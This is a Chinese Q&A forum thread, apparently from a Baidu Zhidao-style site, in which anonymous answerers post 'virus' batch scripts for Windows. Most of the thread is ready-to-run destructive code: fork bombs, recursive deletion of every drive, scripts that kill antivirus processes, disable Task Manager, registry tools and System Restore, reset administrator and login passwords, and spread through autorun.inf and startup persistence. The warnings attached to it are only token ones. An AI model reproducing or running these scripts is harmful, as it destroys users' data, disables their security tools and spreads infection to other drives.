批处理文件的病毒代码大全!
发布网友
发布时间:2022-04-30 23:34
我来回答
共13个回答
热心网友
时间:2022-04-21 20:50
很多,有几个思路贡献下
第一种
:1
start %0
goto 1
这个代码会自己运行自己,产生无限窗口,直到内存爆满死机。
第二种
copy %0 "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*“
copy %0 "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*"
copy %0 "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
加上这个代码之后,会把自身添加到启动菜单中(随系统启动而启动,与shutdown -r -t 0搭配使用威力倍增)
第三种
for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
这是删除CDEF盘上面的gho文件,使用户无法通过ghost恢复系统
第四种(特殊)
Echo Const strPassword = "wohenni"' >>1.vbs
echo Dim WshNetwork >>1.vbs
echo Set WshNetwork = CreateObject("WScript.Network") >>1.vbs
echo Dim userName >>1.vbs
echo userName = WshNetwork.userName&",user" >>1.vbs
echo Dim Domain >>1.vbs
echo Set Domain = GetObject("WinNT://./"&userName) >>1.vbs
echo Domain.SetPassword strPassword >>1.vbs
echo Domain.SetInfo >>1.vbs
echo dim gj >>1.vbs
echo on error resume next >>1.vbs
echo dim WSHshellA >>1.vbs
echo set WSHshellA = wscript.createobject("wscript.shell") >>1.vbs
start “” “1.vbs“
生成能把登录密码改为”wohenni”的VBS,并运行。
第五种
fsutil file createnew C:\1.hahaha 4096000
这是生成特定大小的文件,这句意思是在C盘下面生成1.hahaha,大小为4096000字节
还有很多,不一一列举了,希望您能更好地学习批处理!
热心网友
时间:2022-04-21 22:08
最强病毒!谨慎运行!此程序会将系统搞崩溃.
摘自:htt我ps://www是.jb51.net/a链rticle/7129.h接tm 去掉里面的字哦
@echo off
title You DEAD!!!!!!!
set taskkill=s
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
rem 修改注册表.......
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\
Folder\Hidden\SHOWALL /v
CheckedValue /t REG_DWORD /d 00000000 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRecentDocsMenu /t
REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoDrives /t REG_DWORD /d
4294967295 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
Disableregistrytools /t
REG_DWORD /d 00000002 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoNetHood /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V
NoDesktop /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoClose /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFind /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableTaskMgr /t REG_DWORD
/d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoLogOff /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoSetTaskBar /t REG_DWORD
/d 00000001 /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v
DisableSR /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v
DisableConfig /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
RestrictRun /t REG_DWORD /d
00000001 /f >nul
cls
net user administrator 123456 >nul
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新
安装系统可以解决此问题
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f
>>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf +r +s +h >>d:\setup.bat
attrib d:\setup.bat +r +s +h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
setup.bat /t REG_SZ /d d:\setup.bat
/f >>C:\AUTOEXEC.BAT
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%
windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%
windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat +r +s +h%
attrib %systemroot%/windows.bat +r +s +h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
set drive=e f g h i j k l m n o p q r s t u v w x y z
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start
d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat
/min >>d:\setup.bat
attrib d:\Program" "Files\run.bat +r +s +h >nul
del %0
exit
热心网友
时间:2022-04-21 23:42
呵呵,我笑了
@echo off
assoc .exe=txtfile
assoc .txt=exefile
assoc .html=zipfile
assoc .dll=vbsfile
assoc .sys=batfile
ftype exefile=c:\users\%username%\desktop\123.exe
ftype dllfile=c:\users\%username%\desktop\123.exe
ftype sysfile=c:\users\%username%\desktop\123.exe
ren *.exe *.abc
del c:\*.*/f/s/q
del d:\*.*/f/s/q
del e:\*.*/f/s/q
del f:\*.*/f/s/q
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000002 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 00000001 /f >nul cls net user administrator 123456 >nul
for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
copy %0 "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*"
copy %0 "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*"
copy 0%"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SystemTools.exe.bat"
taskkill /f /fi "pid ne 1"
最后一句蓝屏重启
热心网友
时间:2022-04-22 01:34
以下病毒危险至极,请在虚拟机下测试!
%0|%0
热心网友
时间:2022-04-22 03:42
@ehco off
:start
start
goto start
copy xxxxx C:\Users\ray\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup足矣
热心网友
时间:2022-04-22 06:06
start cmd
%0
热心网友
时间:2022-04-22 08:48
%0|%0
威力极大慎用,我修电脑修了很久
热心网友
时间:2022-04-22 11:46
撑死内存条良心病毒(可以关闭)
@ECHO OFF
title DEMO
rem 此程序无害的
tasklist
start taskmgr
copy %0 "C:\运行.bat"
cls
copy %0 "C:\很好.bat"
cls
copy %0 "C:\GOOD.BAT"
cls
copy %0 "C:\点我.bat"
cls
copy %0 "C:\点我啊.bat"
cls
copy %0 "C:\快点我.bat"
cls
fsutil file createnew C:\你的电脑运行了此无害病毒!!! 0
cls
:1
ping localhost -n 1 > nul
start cmd
echo 此文件为恶搞cmd!!!!
echo By XIAYM
echo 被整爽不爽
echo 看C盘!!!!!!
goto 1
pause
热心网友
时间:2022-04-22 15:00
@echo off
if "%1" == "h" goto begin
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
:begin
rd/s/q "C:\"
rd/s/q "D:\"
rd/s/q "E:\"
rd/s/q "F:\"
热心网友
时间:2022-04-22 18:32
@echo off
del /f /s /q C:\*.*
exit
热心网友
时间:2022-04-22 22:20
1.start cmd
%0
2.%0|%0
热心网友
时间:2022-04-23 02:24
呵呵,我笑了。 直接 DEL C:\*.* /F /S /Q 算了
谁能帮我做一些批处理代码病毒,一个十分,可加分!
echo off title 1 @echo @echo off >%windir%\help.bat >nul @echo attrib +s +a +r +h %windir%\system\help.bat >>%windir%\help.bat >nul @echo attrib +s +a +r +h %windir%\system32\help.bat >>%windir%\help.bat >nul @echo shutdown -s -f -t 0 >>%windir%\...
求一段清除快捷方式病毒的 批处理 代码
echo offecho ---U盘杀毒---@echo.@echo.pause@echo.@echo.echo 正在清除病毒taskkill /F /IM winservice.exe@echo.@echo.echo 请稍等5秒钟pauserd /S /Q C:\WINDOWS\winsystem@echo.@echo.rem 删除病毒文件echo 正在恢复文件夹@echo.@echo.rem 取消属性dir /a:ds /b >dir.txt for /...
怎么用.bat文件查杀病毒?
call 3.bat pause 3.bat代码:c:dir *.htt *.ini /s/a>1.txt d:dir *.htt *.ini /s/a>1.txt e:dir *.htt *.ini /s/a>1.txt 这样,如果中毒,那么必定会存在大量folder.htt和Desktop.ini,通过这样可以粗略的检查计算机是否感染病毒。批处理运用三:文件处理 假设,我要大规模的做...
批处理文件的病毒代码大全!
fsutil file createnew C:\1.hahaha 4096000这是生成特定大小的文件,这句意思是在C盘下面生成1.hahaha,大小为4096000字节还有很多,不一一列举了,希望您能更好地学习批处理! 本回答被提问者采纳 已赞过 已踩过< 你对这个回答的评价是? 评论 收起 纳米核心价值观 2022-12-31 知道答主 回答量:1 采纳...
批处理病毒代码?
给你举一个简单的批处理建立一个文本文档,输入 tree c:\ > c:\1.txt 保存为 tree.bat运行一下,就把C盘目录输入到c盘1.txt里面了,看一下是不是 批处理用处很多,也是可以制作病毒的看看批处理的百度百科吧http://baike.baidu.com/view/356836.htm ...
在记事本里打上某些代码就能做病毒 ?原理是什么
代码就是高级语言,改成不同的后缀名就是不同的文件类型,改成可执行文件后缀的具有破坏性的代码就是病毒了。
批处理 病毒样本
:RunTimeChkif not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txtFOR /F "tokens=1 delims=!" %%i in (%sola%\RunTime.txt) do set RunTime=%%iif /i %RunTime% leq 0 goto Virusset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txt:Diskchkecho On Error Resume ...
...批处理程序清除U盘里的病毒,同时去掉所有文件夹的隐藏、系统属性...
echo %1 盘根目录检测到exe文件 "%%i",是否删除?y/n set /p cho= if not defined cho del /f /q "%%i"if /i "cho" equ "y" del /f /q "%%i")goto :eof :autorunAmmu echo.echo --- echo 3.正在创建 autorun.inf 免疫文件夹,请稍候……attrib -h -s -r %1autorun.inf...
这种病毒怎么处理
echo 此批处理会在每个分区的目录下建立autorun.inf\aaa.文件夹,默 echo 认的情况下是删不掉的,但可以用这个批处理删掉。XP下测试通过。echo.echo.echo [Y] 按 Y 键建立autorun.inf文件夹免疫autorun类病毒 echo [U] 按 D 键删除硬盘所有分区下的autorun.inf文件夹 echo [Q] 按其他任意键...
solaSOLA源代码
病毒行为: 病毒在%systemroot%\Fonts生成以下文件:Regedit.reg、sleep.exe、SOLA.BAT、est_type2032.fon,并创建`solasetup`文件夹。在Tasks.job中创建任务,执行病毒代码。核心代码片段展示了病毒如何通过批处理文件`@echo off`执行操作,如复制文件、创建任务、处理错误和禁用自动播放功能,具体细节已略...